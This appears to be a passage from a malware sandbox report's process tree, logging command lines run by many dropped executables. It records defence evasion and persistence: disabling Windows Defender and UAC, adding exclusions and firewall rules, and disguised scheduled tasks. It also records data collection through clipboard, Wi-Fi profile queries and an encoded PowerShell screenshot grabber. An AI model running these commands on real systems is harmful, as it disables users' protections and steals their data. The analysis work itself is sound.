      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:9136
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f im Wireshark.exe
        6⤵
        Kills process with taskkill
        
        PID:9552
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f
        6⤵
        
        PID:9856
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:9964
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f im Wireshark.exe
        6⤵
        Kills process with taskkill
        
        PID:10088
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachine" /f
        6⤵
        
        PID:5528
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn "MicrosoftEdgeUpdateTaskMachine" /tr C:\ProgramData\dllhost.exe
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:9952
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 5 & Del "C:\Users\Admin\Desktop\Files\main.exe"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1064
      - C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 5
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:4208
  - - C:\Users\Admin\Desktop\Files\Charter.exe
      "C:\Users\Admin\Desktop\Files\Charter.exe"
      4⤵
      Executes dropped EXE
      PID:4856
  - - C:\Users\Admin\Desktop\Files\Taskmgr.exe
      "C:\Users\Admin\Desktop\Files\Taskmgr.exe"
      4⤵
      Executes dropped EXE
      PID:4136
  - - C:\Users\Admin\Desktop\Files\GoodFrag.exe
      "C:\Users\Admin\Desktop\Files\GoodFrag.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5012
    - - C:\Users\Admin\AppData\Roaming\Runtime Broker.exe
        
        "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe"
        5⤵
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:3612
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\Runtime Broker.exe" "Runtime Broker.exe" ENABLE
        6⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        System Time Discovery
        
        PID:1992
  - - C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe
      "C:\Users\Admin\Desktop\Files\NOTallowedtocrypt.exe"
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      PID:2832
    - - C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3048
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:1036
    - - C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe
        
        "C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        
        PID:3704
      - C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1940
        
        C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        7⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:3704
      - \??\c:\program files (x86)\internet explorer\iexplore.exe
        
        "c:\program files (x86)\internet explorer\iexplore.exe"
        6⤵
        Adds Run key to start application
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetWindowsHookEx
        
        PID:3764
        
        C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3932
        
        C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        8⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:404
        
        C:\Users\Admin\Desktop\Files\svchost.exe
        
        svchost.exe
        7⤵
        Executes dropped EXE
        
        PID:736
        
        C:\Windows\SysWOW64\rmclient.exe
        
        rmclient.exe
        7⤵
        
        PID:1372
  - - C:\Users\Admin\Desktop\Files\file.exe
      "C:\Users\Admin\Desktop\Files\file.exe"
      4⤵
      PID:5188
    - - C:\Users\Admin\Desktop\Files\file.exe
        
        "C:\Users\Admin\Desktop\Files\file.exe"
        5⤵
        
        PID:5516
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "query user"
        6⤵
        
        PID:5668
        
        C:\Windows\system32\query.exe
        
        query user
        7⤵
        
        PID:5680
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        8⤵
        
        PID:5732
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "query user"
        6⤵
        
        PID:5976
        
        C:\Windows\system32\query.exe
        
        query user
        7⤵
        
        PID:5996
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        8⤵
        
        PID:6016
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "query user"
        6⤵
        
        PID:5552
        
        C:\Windows\system32\query.exe
        
        query user
        7⤵
        
        PID:5684
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        8⤵
        
        PID:5808
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "query user"
        6⤵
        
        PID:5700
        
        C:\Windows\system32\query.exe
        
        query user
        7⤵
        
        PID:5816
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        8⤵
        
        PID:4208
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "query user"
        6⤵
        
        PID:5272
        
        C:\Windows\system32\query.exe
        
        query user
        7⤵
        
        PID:5508
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        8⤵
        
        PID:5548
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "query user"
        6⤵
        
        PID:6128
        
        C:\Windows\system32\query.exe
        
        query user
        7⤵
        
        PID:1720
        
        C:\Windows\system32\quser.exe
        
        "C:\Windows\system32\quser.exe"
        8⤵
        
        PID:5676
  - - C:\Users\Admin\Desktop\Files\award.pdf.exe
      "C:\Users\Admin\Desktop\Files\award.pdf.exe"
      4⤵
      PID:6032
  - - C:\Users\Admin\Desktop\Files\standalone_payload.exe
      "C:\Users\Admin\Desktop\Files\standalone_payload.exe"
      4⤵
      PID:7084
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c rundll32.exe lib32.dll payload
        5⤵
        
        PID:7164
      - C:\Windows\SysWOW64\rundll32.exe
        
        rundll32.exe lib32.dll payload
        6⤵
        
        PID:2056
  - - C:\Users\Admin\Desktop\Files\amt.exe
      "C:\Users\Admin\Desktop\Files\amt.exe"
      4⤵
      PID:6900
    - - C:\Windows\SysWOW64\more.com
        
        C:\Windows\SysWOW64\more.com
        5⤵
        
        PID:5620
      - C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        6⤵
        
        PID:7412
  - - C:\Users\Admin\Desktop\Files\Money.exe
      "C:\Users\Admin\Desktop\Files\Money.exe"
      4⤵
      PID:4616
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7352
  - - C:\Users\Admin\Desktop\Files\k360.exe
      "C:\Users\Admin\Desktop\Files\k360.exe"
      4⤵
      PID:7288
  - - C:\Users\Admin\Desktop\Files\mcgen.exe
      "C:\Users\Admin\Desktop\Files\mcgen.exe"
      4⤵
      PID:7992
    - - C:\Users\Admin\Desktop\Files\mcgen.exe
        
        "C:\Users\Admin\Desktop\Files\mcgen.exe"
        5⤵
        
        PID:8120
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\mcgen.exe'"
        6⤵
        
        PID:5336
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Desktop\Files\mcgen.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7864
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        6⤵
        
        PID:6748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8060
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:6948
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:7748
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        6⤵
        
        PID:7804
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        7⤵
        
        PID:7952
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        6⤵
        
        PID:760
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
        7⤵
        
        PID:660
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
        6⤵
        
        PID:7092
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
        7⤵
        
        PID:7568
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        6⤵
        
        PID:6116
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:2492
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        6⤵
        
        PID:5328
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:7472
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\Desktop\Files\mcgen.exe""
        6⤵
        Hide Artifacts: Hidden Files and Directories
        
        PID:976
        
        C:\Windows\system32\attrib.exe
        
        attrib +h +s "C:\Users\Admin\Desktop\Files\mcgen.exe"
        7⤵
        Views/modifies file attributes
        
        PID:2992
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏‏ .scr'"
        6⤵
        
        PID:4712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏‏ .scr'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:424
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:664
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:7720
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:7156
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:7344
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        6⤵
        
        PID:196
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        7⤵
        
        PID:6628
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        6⤵
        Clipboard Data
        
        PID:6792
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        7⤵
        Clipboard Data
        
        PID:7196
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        6⤵
        
        PID:6980
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        7⤵
        Enumerates processes with tasklist
        
        PID:3680
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        6⤵
        
        PID:6716
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        7⤵
        
        PID:2312
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
        6⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:6044
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        7⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:7404
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "systeminfo"
        6⤵
        
        PID:7644
        
        C:\Windows\system32\systeminfo.exe
        
        systeminfo
        7⤵
        Gathers system information
        
        PID:2844
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
        6⤵
        
        PID:7872
        
        C:\Windows\system32\reg.exe
        
        REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
        7⤵
        
        PID:4312
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        6⤵
        
        PID:5352
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAa